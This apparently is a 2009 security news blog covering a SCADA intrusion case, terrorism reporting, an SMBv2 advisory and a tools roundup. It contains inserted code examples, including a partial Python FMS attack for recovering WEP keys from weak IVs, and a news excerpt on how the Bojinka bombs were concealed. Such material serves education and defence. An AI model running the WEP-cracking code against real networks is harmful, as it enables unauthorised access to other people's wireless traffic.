According to court records, Azar accessed Supervisory Control and Data Acquisition (SCADA) computer systems belonging to Pacific Energy Resources of Long Beach, California, and caused the company to lose control of its computer systems around May or June of 2008.

Only a handful of SCADA computer intrusions have been reported, but because the systems are used to control large-scale industrial systems in manufacturing plants, public utilities and the chemical industry, security experts worry that tampering with them could lead to a large-scale power outage or environmental disaster.

Azar played a role in setting up a system that helped the company communicate between its headquarters and oil platforms, and which was also used to detect leaks on the company's oil platforms. He had several user accounts on company systems, authorities said.

His actions caused thousands of dollars in damage, authorities said, but did not cause oil leaks or otherwise harm the environment.

He is due to be sentenced on Dec. 7 in United States District Court for the District of Los Angeles.

United Nations Adopts US-Drafted Resolution on Nuclear Weapons

Via VOA News -

The United Nations Security Council has unanimously approved a resolution to increase efforts to eventually rid the world of nuclear weapons.

U.S. President Barack Obama presided over a special session of the Security Council Thursday.

The leaders of all 15 Security Council member nations voted for the U.S.-drafted resolution.

The plan sets a framework for dealing with nuclear arms reduction, disarmament and the threat of nuclear terrorism.

It calls for states to set up specific goals on nuclear arms reduction and disarmament, bolsters the Nuclear Non-proliferation Treaty, and calls for greater security of nuclear weapons materials to prevent them from falling into the hands of terrorists.

The resolution singles out Iran and North Korea as "major challenges" to the Security Council's efforts on non-proliferation.

Mr. Obama is the first U.S. president to chair a summit-level meeting at the council.

Also Thursday, U.S. Secretary of State Hillary Clinton will give the opening speech of a two-day conference on the Comprehensive Test Ban Treaty. This is the first time a U.S. delegation has participated in the biennial conference since 1999.

Clinton's husband, former U.S. President Bill Clinton, signed the treaty in 1996, but the U.S. Senate rejected it three years later.

US Charges Najibullah Zazi with Bomb Plot

Via VOA News -

An Afghan-born man detained in the United States as part of a terror investigation has been charged with conspiring to detonate bombs in the U.S.

The indictment unveiled Thursday in New York alleges Najibullah Zazi spent more than a year plotting the attack with others.

The government says Zazi "received detailed bomb-making instructions in Pakistan, purchased components of improvised explosive devices and traveled to New York City on September 10, 2009" to move forward with his plans.

Zazi was detained in the midwestern U.S. state of Colorado Saturday along with his father, Mohammed Wali Zazi, on charges of lying to counterterrorism investigators. A third Afghan man, Ahmad Wais Afzali, was detained in New York City the same day on the same charges.

All three men are legal permanent residents or naturalized citizens of the United States.

The U.S. Department of Justice says the government wants Zazi to be transferred to New York to face this new charge.

Zazi has denied any links to terrorism.

The 24-year-old was born in Afghanistan and moved to Pakistan as a boy before relocating with his family to the U.S. about 10 years ago.


Check out this LATimes article for more details....
"Zazi remained committed to detonating an explosive device up until the date of his arrest, as exemplified by among other things, traveling overseas to receive bomb-making instructions, conducting extensive research on the internet regarding components of explosive devices, purchasing -- on multiple occasions -- the components necessary to produce TATP [Triacetone Triperoxide] and other explosive devices, and traveling to New York City on September 10, 2009 in furtherance of the criminal plan," a Justice Department detention memo states.

Wednesday, September 23, 2009

Metasploit Unleashed - Mastering the Framework

This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework.

This is the free online version of the course. If you enjoy it and find it useful, we ask that you make a donation to the HFC (Hackers For Charity), $4.00 will feed a child for a month, so any contribution is welcome. We hope you enjoy this course as much as we enjoyed making it.

The "full" version of this course includes a PDF guide (it has the same material as the wiki) and a set of flash videos which walk you through the modules. You may purchase these materials from the Offensive Security Training page. All proceeds from this course go to HFC.

DoD Preparing To Lift USB Ban

Via -

The ban on USB drives that began late last year in the U.S. Defense Department will be lifted, but with a caveat: Only DoD-approved or procured devices will be allowed.

Robert Cary, CIO for the U.S. Navy, in a recent blog post said Defense officials are hashing out the final policy for allowing USBs back into the department. The Commander of the U.S. Strategic Command in November suspended the use of all USB flash and removable storage devices and camera flash cards from all DoD networks after a worm infection spread across some DoD networks.

"In the future, we expect that a government-owned and procured USB flash media that is uniquely and electronically identifiable for use in support of mission-essential functions on DoD networks will be permitted for use by authorized individuals," Cary said in his blog. "The bottom line is, the days of using personally owned flash media or using flash media collected at conferences or trade shows are long gone. What we connect to our home PCs is very different from what is and will be allowed to occur on DON [Department of Navy] networks."

The Navy is also reducing its reliance on USB flash media, Cary said. "...we are working on moving our access to information to the use of collaborative workspaces, file shares and portals within our protected enclaves. This will reduce our reliance on USB flash media, mitigate unnecessary risk to the GIG, and protect our data and information by keeping it stored within our network boundaries," he said.

Meanwhile, the DoD Removable Storage Media Tiger Team is coordinating a Defense USB policy that will be incorporated into USSTRATCOM guidelines, and the Navy and Marine Corps are working on their own organization-specific operational orders for when the ban is lifted.

Among other things, the Navy is upgrading its antivirus and malware detection, alerting, and remediation, Cary said, and improving controls that deny unauthorized USBs from the network.

Cary noted that although the DoD previously had policies in place for using USBs safely, "they were not being followed."

"Unfortunately, it was our bad IT hygiene that resulted in the ban of this all too flexible use of storage media," he said.

Suppressed Texas Instruments Cryptographic Signing Keys

Texas Instruments, a large US electronics company, is the market leader for sophisticated programmable calculators used by millions of students and engineers. Recently, TI has served internet publishers with DMCA legal threats for distributing cryptographic keys that permit owners of TI calculators to install third-party system software on TI calculators -- an anti-competitive, and arguably unethical act by TI.

The file here presents the Operating System signing keys for different Texas Instruments calculators. The key for the TI-83 calculator was first published by someone at the forum. He or she needed several months to crack it. The other keys were found after a few weeks by the community through a distributed computing project. The keys make it possible for people to create new OS software to be used on Texas Instruments calculators.

Texas Instruments contacted several people with DMCA notices to take down the keys from their websites. Some of the websites which got a DMCA notice are:, and. One of these DMCA notices can be found here:



More TI signing keys are on Wikileaks as well...,_28_Aug_2009

NRC Report: Technology, Policy, Law, and Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities

The National Research Council (NRC) functions under the auspices of the National Academy of Sciences (NAS), the National Academy of Engineering (NAE), and the Institute of Medicine (IOM). The NAS, NAE, IOM, and NRC are part of a private, nonprofit institution that provides science, technology and health policy advice under a congressional charter signed by President Abraham Lincoln that was originally granted to the NAS in 1863. Under this charter, the NRC was established in 1916, the NAE in 1964, and the IOM in 1970. The four organizations are collectively referred to as the National Academies.


Report looks to have been put together by the Committee on Offensive Information Warfare & the Computer Science and Telecommunications Board (CSTB)

Somalia's Al-Shabab Releases Video Vowing Allegiance to Osama Bin Laden

Via Yahoo! News (AP) -

An Islamic insurgent group that controls much of lawless Somalia has released a video showing its members vowing allegiance to Osama bin Laden, training in dusty camps and slamming Somalia's U.S.-backed president as a traitor.

The tape was released late Sunday by al-Shabab, an insurgent group that last week hit the African Union peacekeeping base with suicide car bombs, killing 21 people in the deadliest single attack on peacekeepers since they arrived in 2007.

Al-Shabab announced the Thursday attack at Mogadishu's airport was in retaliation for a U.S. commando raid on Sept. 14 that killed al-Qaida operative Saleh Ali Saleh Nabhan in southern Somalia.

The United States has become increasingly concerned that al-Qaida insurgents are moving into anarchic Somalia, where they can mobilize recruits without interference.

The video showed the Shabab militia in training, leaping over piles of sandbags, crawling on the ground and shooting at targets. White-skinned bearded trainers could be seen moving among the Somalis. The video also showed crowds chanting: "At your service Osama!"

Sheik Hassan Ya'qub, a spokesman for al-Shabab, said the video is "aimed at showing how the youth are well-trained and ready to defend their holy land." Shabab means "youth" in Arabic.

Bin Laden has declared his support for Somali insurgents before. The new video shows the mutual affection is strong as ever — a growing concern for U.S. and other governments. Al-Qaida bombed the U.S. embassies in Kenya and Tanzania in 1998, killing more than 200 people, and one of the alleged plotters is believed to be hiding out in Somalia. Stronger ties between al-Qaida and al-Shabab could pose greater threats to Western interests in the region.

The video features periodic commentary from a voice purported to be bin Laden's, criticizing the administration of Somali President Sheik Sharif Sheik Ahmed as un-Islamic for its ties to America. Sharif met last month with U.S. Secretary of State Hillary Rodham Clinton, who pledged to expand American support for Somalia's government.

The comments from the al-Qaida leader echo comments of support he made in March. It was not immediately clear if they were from the same recording.


The segment of video that is dedicated to Osama bin Laden and Mullah Omar can be seen over @ The Long War Journal. The tape appears to be Shabaab's signal that it has joined Al Qaeda.

A Stick Figure Guide to the Advanced Encryption Standard (AES)

Check out the AES's full story....

Addendum to SRI's Conficker C Analysis Published


SRI recently updated their Conficker C analysis with another addendum; this one covers Conficker C's P2P protocol and implementation. Here's the abstract of the new addendum:

This report presents a reverse engineering of the obfuscated binary code image of the Conficker C peer-to-peer (P2P) service, captured on 5 March 2009 (UTC). The P2P service implements the functions necessary to bootstrap an infected host into the Conficker P2P network through scan-based peer discovery, and allows peers to share and spawn new binary logic directly into the currently running Conficker C process. Conficker's P2P logic and implementation are dissected and presented in source code form. The report documents its thread architecture, presents the P2P message structure and exchange protocol, and describes the major functional elements of this module.

As always, this is a GREAT report from the Malware Threat Center at SRI.

Apple iTunes ".pls" Processing Buffer Overflow Vulnerability


A vulnerability has been reported in Apple iTunes, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error in the processing of ".pls" files and can be exploited to cause a buffer overflow.

Successful exploitation may allow execution of arbitrary code.

The vulnerability is reported in version 9 for Windows and Mac.

Update to version 9.0.1.

The vendor credits Steven Woolley at Oogli LLC.

Original Advisory:

CVE reference:


Tuesday, September 22, 2009

New ICSA Labs Service Certifies Security Of Printers, Copiers & ATMs

Via -

If a toaster can be hacked, then there ought to be a way for toaster manufacturers -- and the enterprises that use them -- to find out whether their toasters are safe to use.

This simple idea is behind a pair of security certification and assessment services launched today by ICSA Labs, an independent division of Verizon Business. The new services are designed to test the security of nonmainstream networked devices, such as printers, copiers, faxes, security cameras, and point-of-sale systems.

ICSA Labs is offering a vendor certification program and comprehensive enterprise assessment service that are designed to test the security of devices that connect directly to a network, but are not part of the network infrastructure itself. This list includes ATM machines, digital signs, proximity readers, and facility management systems for power, lighting, and HVAC systems, ICSA says.

Numerous proofs-of-concept have been demonstrated on nonmainstream devices at various conferences over the years. This year's Black Hat conference, for example, featured a demonstration of hacks on networked parking meters, while previous years' conferences included hacks of toasters, soda machines, and even medical implants.

"There is a growing base of networked devices out there, everything from those multifunction devices that do printing, faxing, and scanning to specialized devices that are used in specific industries," says George Japak, managing director at ICSA Labs. "Any one of these could potentially be a threat to your network, or a vulnerability in one of these devices could cause you to fall out of compliance with standards like PCI or HIPAA."

ICSA Labs is offering Network Attached Peripheral Security (NAPS) certification, which helps manufacturers identify and remediate existing and potential vulnerabilities in their networked devices. The second new offering, NAPS assessment, helps enterprises determine through a one-time evaluation whether network-attached devices are installed securely and protected from exploitation.

A new white paper from ICSA Labs, "Living on the Edge" (PDF), examines network-attached peripherals and the security risks they pose.

"This will be an even greater issue down the road, as companies deal not only with older networked devices, such as printers and copiers, but with next-generation technology that takes advantage of wireless and remote networks," Japak says.

Al-Qaeda Threatens German Post Election Attack

Via Shimron Letters -

A senior al Qaeda leader has threatened to attack Germany just days before the nation will go to the polls to choose a new Chancellor.

Bekkay Harrach, alias Al Hafidh Abu Talha al Almani, resurfaced Friday in a chilling new video produced by al Qaeda's al Fajr Media Center and distributed across the major jihadi Web forums.

Dressed in an ill-fitting black blazer, blue tie, and shoulder-length greased hair - looking more like a teenager dressed for his first job interview - he slammed Germany for its military presence in Afghanistan and warned that if Chancellor Angela Merkel is reelected on Sept. 27, Germany will be directly attacked.

His previous warning to Germany, on Jan. 17, 2009, coincided with a massive car bomb attack on the heavily guarded German embassy in Kabul that was orchestrated by the notorious Haqqani Network. Four Afghan civilians and an American soldier died in the attack.

"The vote on September 27 is more than a choice between a man and a woman," he warned in the new video, which was acquired by the Long War Journal. "As an old aphorism says, 'Security is foremost.'

In the democratic system, only the people can return the soldiers to their homeland. If the people insist on continuing the war (in Afghanistan), they sentence themselves to retaliation and clearly show the world that civilians in the democratic system are not innocent people."

He addressed Germany's Muslim community and said:

"(S)tay clear of all that is not necessary in the two weeks of the elections if the German people did not decide to withdraw its soldiers from Afghanistan.

Keep your children near you at this time. Ask God to bless you and your children."

"The city of Kiel," he continued inexplicably, "will remain a safe city no matter how long the conflict in Germany. This is a promise from me."


More on this story and Bekkay Harrach can be found over at The Long War Journal...
Harrach is a 32-year-old Moroccan whose family emigrated to Germany when he was two years old; he became a naturalized German citizen in 1997. Harrach has become a rising star in al Qaeda's new generation and is reportedly on its shura council for global strikes. Reports suggest that his travels are tracked by intelligence agencies, however, according to Spiegel Online, he is directly protected by Siraj Haqqani and his deadly network.

Monday, September 21, 2009

In Memory of DJ Roc Raida

1995 DMC World DJ Champion - Roc Raida

X-Ecutioner member and Busta Rhymes' personal deejay, Anthony "DJ Roc Raida" Williams, has passed on.....Williams passed away on Saturday September 19, 2009, due to complications from a mixed-martial-arts accident, according to a statement released by his family. He had been released to an inpatient physical therapy facility at the time of his death.

Busta announced the unexpected news via his Twitter account Saturday afternoon.
"I am sorry 2 say that on this day at 2:05 Sept 19th we lost another incredible life...Dj Roc Raida died 2day my personal Dj is gone... I just wanna thank everyone 4 ur love and support and ur prayers...We will never let ur name die Roc...We love u and will 4ever miss u...RIP." (Busta Rhymes' Twitter)

RIP Roc Raida

Update on the SMB Vulnerability Situation

Via Microsoft's SVD Blog -

We’d like to give everyone an update on the situation surrounding the new Microsoft Server Message Block Version 2 (SMBv2) vulnerability affecting Windows Vista and Windows Server 2008.


Easy way to disable SMBv2

Until the security update is released, the best way to protect systems from this vulnerability is to disable support for version 2 of the SMB protocol. The security advisory was updated yesterday with a link to the Microsoft Fix It package that disables SMBv2 and then stops and starts the Server service. (This initial Fix It might prompt you to also restart the Browser service.)


Disabling SMBv2 may slow down SMB connections between Windows Vista and Windows Server 2008 machines.
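The Fix It package applies the same workaround as the advisory's manual steps: it sets the Smb2 value under the LanmanServer parameters key to 0 and restarts the Server service. The script below is an added example, not Microsoft's Fix It or code from the SVD post; it assumes an elevated PowerShell session on Vista or Server 2008 and that the Smb2 registry value is the documented workaround switch.

```powershell
# Added example (not from Microsoft's post): disable SMBv2 through the
# LanmanServer registry value the advisory workaround uses, then restart
# the Server service. Assumes an elevated PowerShell session.

$SmbParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb2State {
    # SMBv2 is on by default: a missing value or any nonzero value means enabled.
    $prop = Get-ItemProperty -Path $SmbParams -Name Smb2 -ErrorAction SilentlyContinue
    if ($null -eq $prop -or $prop.Smb2 -ne 0) { return 'Enabled' }
    return 'Disabled'
}

function Disable-Smb2 {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    if ($PSCmdlet.ShouldProcess('LanmanServer', 'Set Smb2 = 0 and restart the Server service')) {
        # -Force creates the DWORD value if absent and overwrites it if present.
        New-ItemProperty -Path $SmbParams -Name Smb2 -Value 0 -PropertyType DWord -Force | Out-Null
        # Computer Browser depends on Server; -Force restarts dependent services too,
        # which is why the Fix It may also prompt to restart the Browser service.
        Restart-Service -Name LanmanServer -Force
    }
}

"Before: SMBv2 is $(Get-Smb2State)"
Disable-Smb2
"After:  SMBv2 is $(Get-Smb2State)"
```

Run with `Disable-Smb2 -WhatIf` first to see the change without applying it; re-enable SMBv2 once the security update is installed, since the workaround also slows Vista-to-Server 2008 file transfers.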

First exploit for code execution released to small number of companies

We are not aware of any in-the-wild exploits or any real-world attacks.

However, we are aware of exploit code developed by Immunity Inc. and released to customers who subscribe to the CANVAS Early Updates program. We have analyzed the code ourselves and can confirm that it works reliably against 32-bit Windows Vista and Windows Server 2008 systems. The exploit gains complete control of the targeted system and can be launched by an unauthenticated user.

The exploit can be detected by intrusion detection systems (IDS) and firewalls that have signatures for the vulnerability being targeted (CVE-2009-3103).

This exploit code from Immunity is only available to a small group of companies and organizations who will use it to determine the risk to their own networks and systems, or those of their customers. (We are aware that other groups are actively working on exploit code which is likely to be made public when it is completed).

Sunday, September 20, 2009

Convergence: The Challenge of Aviation Security

Via Stratfor (Global Security & Intelligence Report) -


The airline security paradigm changed on 9/11. In spite of the recent statement by al Qaeda leader Mustafa Abu al-Yazid that al Qaeda retains the ability to conduct 9/11-style attacks, his boast simply does not ring true. After the 9/11 attacks there is no way a captain and crew (or a group of passengers for that matter) are going to relinquish control of an aircraft to hijackers armed with box cutters — or even a handgun or IED. A commercial airliner will never again be commandeered from the cockpit and flown into a building — especially in the United States.

Because of the shift in mindset and improvements in airline security, the militants have been forced to alter their operational framework. In effect they have returned to the pre-9/11 operational concept of taking down an aircraft with an IED rather than utilizing an aircraft as human-guided missile. This return was first demonstrated by the December 2001 attempt by Richard Reid to destroy American Airlines Flight 63 over the Atlantic with a shoe bomb and later by the thwarted 2006 liquid-explosives plot. The operational concept in place now is clearly to destroy rather than commandeer. Both the Reid plot and the 2006 liquid-bomb plot show links back to the operational philosophy evidenced by Operation Bojinka in the mid-1990s, which was a plot to destroy multiple aircraft in flight over the Pacific Ocean.

The return to Bojinka principles is significant because it represents not only an IED attack against an aircraft but also a specific method of attack: a camouflaged, modular IED that the bomber smuggles onto an aircraft in pieces and then assembles once he or she is aboard and well past security. The original Bojinka plot used baby dolls to smuggle the main explosive charge of nitrocellulose aboard the aircraft. Once on the plane, the main charge was primed with an improvised detonator that was concealed inside a carry-on bag and then hooked into a power source and a timer (which was disguised as a wrist watch). The baby-doll device was successfully smuggled past security in a test run in December 1994 and was detonated aboard Philippine Air Flight 434.

The main charge in the baby-doll devices, however, proved insufficient to bring down the aircraft, so the plan was amended to add a supplemental charge of liquid triacetone triperoxide (or TATP, aptly referred to as “Mother of Satan”), which was to be concealed in a bottle of contact lens solution. The plot unraveled when the bombmaker, Abdel Basit (who is frequently referred to by one of his alias names, Ramzi Yousef), accidentally set his apartment on fire while brewing the TATP.


The biggest difference between Bojinka and more recent plots is that the Bojinka operatives were to smuggle the components aboard the aircraft, assemble the IEDs inside the lavatory and then leave the completed devices hidden aboard multi-leg flights while the operatives got off the aircraft at an intermediate stop. The more recent iterations of the jihadist airplane-attack concept, including Richard Reid’s attempted shoe bombing and the 2006 liquid-bomb plot, planned to use suicide bombers to detonate the devices midflight. The successful August 2004 twin aircraft bombings in Russia by Chechen militants also utilized suicide bombers.

The shift to suicide operatives is not only a reaction to increased security but also the result of an evolution in ideology — suicide bombings have become more widely embraced by jihadist militants than they were in the early 1990s. As a result, the jihadist use of suicide bombers has increased dramatically in recent years. The success and glorification of suicide operatives, such as the 9/11 attackers, has been an important factor in this ideological shift.

One of the most recent suicide attacks was the Aug. 28 attempt by al Qaeda in the Arabian Peninsula (AQAP) to assassinate Saudi Prince Mohammed bin Nayef. In that attack, a suicide operative smuggled an assembled IED containing approximately one pound of high explosives from Yemen to Saudi Arabia concealed in his rectum. While in a meeting with Mohammed, the bomber placed a telephone call and the device hidden inside him detonated.


The section above is only a small part of the article...worth a full read, follow the link above.

Tools of the Trade - NOVA Edition

NOVA is my new I figured I would give you some information about the area.

Northern Virginia (colloquially referred to as "NOVA") consists of several counties and independent cities in the U.S. state of Virginia in a widespread region generally radiating southerly and westward from Washington, D.C. Notable features of the region include the Pentagon and the Central Intelligence Agency, and the many companies which serve them and the federal government. The area's attractions include various monuments and Colonial and Civil War-era sites such as Mount Vernon and Arlington National Cemetery.

Northern Virginia's data centers currently carry more than 50% of the nation's Internet traffic, and by 2012 Dominion Power expects that 10% of all electricity it sends to Northern Virginia will be used by the region's data centers alone.


On Sept 16th, Adam Laurie, known as Major Malfunction in the hacker community, released RFIDIOt 0.1z. RFIDIOt is a Python library for exploring RFID devices. It currently drives two RFID readers made by ACG, the HF Dual ISO and the LFX, and includes sample programs to read and write tags along with the beginnings of library routines to handle the data structures of specific tags such as MIFARE(r). Check his announcement e-mail for all the change details.

On Sept 16th, Snort 2.8.5 was released. Here are some highlights from the release notes:
  • Ability to specify multiple configurations (snort.conf and everything it includes), bound either by Vlan ID or IP Address. This allows you to run one instance of Snort with multiple snort.conf files, rather than having separate processes.
  • Continued inspection of traffic while reloading a configuration.
    (Pass the --enable-reload option to the configure script before building to get this.)
  • Rate Based Attack Prevention for Connection Attempts, Concurrent Connections, and improved rule/event filtering.
  • SSH preprocessor is no longer experimental
  • Multiple performance improvements
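A snort.conf fragment that exercises the first three of those features, added here as an example (it is not from the Snort release notes). The file paths, VLAN IDs, subnet and the sid 2001 are placeholders; the rate_filter lines follow the examples in the Snort manual, where gen_id 135 / sig_id 1 is the stream5 "connection attempts" event and sig_id 2 the "simultaneous connections" event.

```conf
# /etc/snort/snort.conf  (main configuration; placeholder paths and numbers)

# Multiple configurations in ONE snort process: frames tagged VLAN 10 or 20-30
# are inspected with the first policy file, the 10.1.0.0/16 DMZ with the second,
# and everything else with the rules in this file.
config binding: /etc/snort/policies/corp-vlans.conf vlan 10,20-30
config binding: /etc/snort/policies/dmz.conf      net 10.1.0.0/16

# Rate-based attack prevention needs stream5 to track the connections.
preprocessor stream5_global: track_tcp yes
preprocessor stream5_tcp: policy first

# Allow at most 100 new TCP connection attempts per second from any one source;
# beyond that, drop its further attempts for 10 seconds.
rate_filter gen_id 135, sig_id 1, track by_src, count 100, seconds 1, new_action drop, timeout 10
# Allow at most 200 simultaneous connections from any one source (seconds 0 = instantaneous count).
rate_filter gen_id 135, sig_id 2, track by_src, count 200, seconds 0, new_action drop, timeout 30

# Event filtering: rule 1:2001 (placeholder sid) alerts at most once per minute per source host,
# so a noisy scanner produces one alert instead of thousands.
event_filter gen_id 1, sig_id 2001, type limit, track by_src, count 1, seconds 60
```

With a build configured using --enable-reload, validate the edited file first with `snort -T -c /etc/snort/snort.conf`, then send the running process a SIGHUP (`kill -HUP <pid>`); Snort keeps inspecting with the old configuration until the new one has been parsed and swapped in. Bind a policy to VLANs only if the sensor actually sees the 802.1Q tags (a SPAN port that strips them will match nothing).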
On Sept 15th, Nessus 4.0.2 was released. This release includes several fixes and support for the latest operating systems from Microsoft and Apple (i.e. Windows 7 and Snow Leopard). All customers are encouraged to upgrade to the latest version of the Nessus Server and NessusClient.

On Sept 15th, Wireshark 1.2.2 was released. This release fixes the following vulnerabilities:
  • The GSM A RR dissector could crash. (Bug 3893) - Versions affected: 1.2.0 to 1.2.1
  • The OpcUa dissector could use excessive CPU and memory. (Bug 3986) - Versions affected: 0.99.6 to 1.0.8, 1.2.0 to 1.2.1
  • The TLS dissector could crash on some platforms. (Bug 4008) - Versions affected: 1.2.0 to 1.2.1
On Sept 14th, KeePassX 0.4.1 was released. KeePassX is an open-source password manager for people with high demands on secure personal data management. It stores many kinds of information (user names, passwords, URLs, attachments and comments) in one encrypted database. It began as a Linux port of KeePass Password Safe and also runs on Apple OS X and Windows. Check the changelog for all the details.

On Sept 11th, Harald Scan 0.31 was released. Harald Scan is a Bluetooth discovery scanner written in Python. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to its vendor using the largest known vendor/MAC address list. This Linux-only release adds a -u option to update the MACLIST to the most recent version, adds a proper GPLv3 disclaimer and license, and fixes other minor bugs (mostly not noticed by users).

On Sept 10th, PDFResurrect 0.8 was released. PDFResurrect is a tool for analyzing PDF documents. Because PDF writers can save changes as incremental updates appended to the end of the file, earlier versions of a document often survive inside it; PDFResurrect attempts to extract all previous versions and produces a summary of the changes between them. It can also "scrub" the file, writing over the original instances of PDF objects that were later modified or deleted, so that information from previous versions is not left for other readers to find. This release is mainly a bug-fix.
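How that kind of version recovery works, as an added example (my code, not PDFResurrect's): an incrementally saved PDF ends every revision with `%%EOF`, and each later trailer carries a `/Prev` pointer to the previous cross-reference table, so earlier revisions are byte prefixes of the file and the update chain can be walked backwards. The two-revision document below is constructed inline (the "DRAFT: salary 90000" text is made up), and `scrub` blanks superseded objects in place the way the tool's scrub option is described as doing.

```python
"""Walk a PDF's incremental-update chain, carve earlier revisions, scrub stale objects.

Added example; not PDFResurrect's code. The sample file is built inline so the
xref offsets are real and the /Prev chain can be followed.
"""
import re

EOF_RE = re.compile(rb"%%EOF\s*")
STARTXREF_RE = re.compile(rb"startxref\s+(\d+)")
PREV_RE = re.compile(rb"/Prev\s+(\d+)")
OBJ_RE = re.compile(rb"(\d+) \d+ obj(.*?)endobj", re.S)


def _stream_obj(num, text):
    """A page content stream object showing one line of text."""
    content = b"BT /F1 12 Tf (" + text + b") Tj ET"
    return num, (b"%d 0 obj << /Length %d >> stream\n" % (num, len(content))
                 + content + b"\nendstream endobj\n")


def _section(objs, start, size, prev=None):
    """Serialise objects + xref + trailer + startxref for one revision placed at byte 'start'."""
    body, offsets = b"", {}
    for num, data in objs:
        offsets[num] = start + len(body)
        body += data
    xref_off = start + len(body)
    xref = b"xref\n" + b"".join(b"%d 1\n%010d 00000 n \n" % (n, offsets[n]) for n in sorted(offsets))
    trailer = b"trailer\n<< /Size %d /Root 1 0 R" % size
    if prev is not None:
        trailer += b" /Prev %d" % prev          # link to the previous revision's xref
    trailer += b" >>\nstartxref\n%d\n%%%%EOF\n" % xref_off
    return body + xref + trailer, xref_off


def build_sample_pdf():
    """Constructed two-revision file: the draft content stream is replaced by an update."""
    pdf = b"%PDF-1.4\n"
    rev0 = [
        (1, b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"),
        (2, b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"),
        (3, b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj\n"),
        _stream_obj(4, b"DRAFT: salary 90000"),
    ]
    section, xref0 = _section(rev0, len(pdf), 5)
    pdf += section
    update, _ = _section([_stream_obj(4, b"Offer letter")], len(pdf), 5, prev=xref0)
    return pdf + update                          # old object 4 is still in the file


def revision_ends(pdf):
    """Byte offset just past each %%EOF, oldest revision first."""
    return [m.end() for m in EOF_RE.finditer(pdf)]


def carve(pdf, n):
    """Revision n (0 = original) as a standalone PDF: the prefix ending at its %%EOF."""
    return pdf[:revision_ends(pdf)[n]]


def xref_chain(pdf):
    """Offsets of the xref tables, newest first, following startxref and the /Prev links."""
    offsets = [int(list(STARTXREF_RE.finditer(pdf))[-1].group(1))]
    while True:
        t_start = pdf.find(b"trailer", offsets[-1])
        t_end = pdf.find(b"startxref", t_start)
        prev = PREV_RE.search(pdf, t_start, t_end)
        if prev is None:
            return offsets
        offsets.append(int(prev.group(1)))


def changed_objects(pdf):
    """(revision, object number, old body, new body) for every object an update redefined."""
    ends = [0] + revision_ends(pdf)
    seen, report = {}, []
    for k in range(len(ends) - 1):
        for m in OBJ_RE.finditer(pdf, ends[k], ends[k + 1]):
            num, body = int(m.group(1)), m.group(2)
            if num in seen and seen[num] != body:
                report.append((k, num, seen[num], body))
            seen[num] = body
    return report


def scrub(pdf):
    """Overwrite every superseded object body with spaces (same length, so offsets stay valid)."""
    out = bytearray(pdf)
    spans = {}
    for m in OBJ_RE.finditer(pdf):
        spans.setdefault(int(m.group(1)), []).append(m.span(2))
    for versions in spans.values():
        for start, end in versions[:-1]:         # keep only the newest instance readable
            out[start:end] = b" " * (end - start)
    return bytes(out)


if __name__ == "__main__":
    doc = build_sample_pdf()
    print(len(revision_ends(doc)), "revisions; xref chain", xref_chain(doc))
    for k, num, old, new in changed_objects(doc):
        print("update %d redefined object %d: %r -> %r" % (k, num, old, new))
```

Note what `scrub` does and does not do: it blanks the bytes, so the current revision still parses and the file length is unchanged, but a reviewer should still rewrite the document through a "save as" that drops the update chain before releasing it, since metadata streams and object streams can carry history that this regex-level pass will not see.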

On Sept 9th, VirtualBox 3.0.6 was released. VirtualBox is a general-purpose full virtualizer for x86 hardware. Targeted at server, desktop and embedded use, it is now the only professional-quality virtualization solution that is also Open Source Software. Check the changelog for all the details.

On Sept 8th, CDBurnerXP was released. CDBurnerXP is a free application to burn CDs and DVDs, including Blu-Ray and HD-DVDs. It also includes the feature to burn and create ISOs, as well as a multilanguage interface. This version added a verification method for the file count of the disc to detect broken file system structures.

On Sept 8th, Aircrack-ng 1.0 was released. Aircrack-ng is an 802.11 WEP and WPA-PSK key-cracking program that can recover keys once enough data packets have been captured. For WEP it implements the standard FMS attack along with optimizations such as the KoreK attacks, as well as the newer PTW attack, which needs far fewer captured packets and so makes the attack much faster than other WEP cracking tools. Check out the official Aircrack-ng blog for changelog highlights.
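The FMS attack referred to above, as an added example (my code, not Aircrack-ng's). WEP seeds RC4 with IV||key and sends the IV in clear, and every data frame starts with the SNAP byte 0xAA, so the first keystream byte of each frame is known; for "resolved" IVs the RC4 key schedule leaks the next key byte from that byte about 5% of the time, and voting over many such frames recovers the key one byte at a time. The 40-bit key and the capture are constructed inline, with the IVs restricted to the classic weak class (A+3, 255, X) so a few hundred frames per key byte suffice where a real capture needs millions of frames to contain that many. The `fudge` parameter is a depth-first search over the best few candidates per byte with verification against captured frames, the same idea as aircrack-ng's fudge factor.

```python
"""FMS-style recovery of a WEP key from frames with weak IVs (added example, not aircrack-ng code)."""

SNAP0 = 0xAA                                            # known first plaintext byte of a WEP data frame
SECRET_KEY = bytes([0x1F, 0x2E, 0x3D, 0x4C, 0x5B])      # constructed 40-bit key the "victim" uses


def ksa(key, steps=256):
    """RC4 key scheduling. steps < 256 returns the partial state (S, j) the attack simulates."""
    s = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_first_byte(key):
    """First PRGA output byte for the given IV||key."""
    s, _ = ksa(key)
    j = s[1]
    s[1], s[j] = s[j], s[1]
    return s[(s[1] + s[j]) & 0xFF]


def capture(secret_key):
    """Constructed capture: (iv, first ciphertext byte) for the weak IVs (A+3, 255, X), every X."""
    frames = []
    for a in range(len(secret_key)):
        for x in range(256):
            iv = bytes([a + 3, 255, x])
            frames.append((iv, rc4_first_byte(iv + secret_key) ^ SNAP0))
    return frames


def vote(frames, prefix):
    """Score the 256 candidates for key byte len(prefix), given the bytes already recovered.

    After 3+A KSA steps (IV plus known key bytes) an IV is 'resolved' when x = S[1] < 3+A
    and x + S[x] == 3+A. Then, with probability ~e^-3, the first keystream byte ks0 equals
    S[3+A] after step 3+A, i.e. S[j'] with j' = j + S[3+A] + K[3+A], which gives K[3+A].
    """
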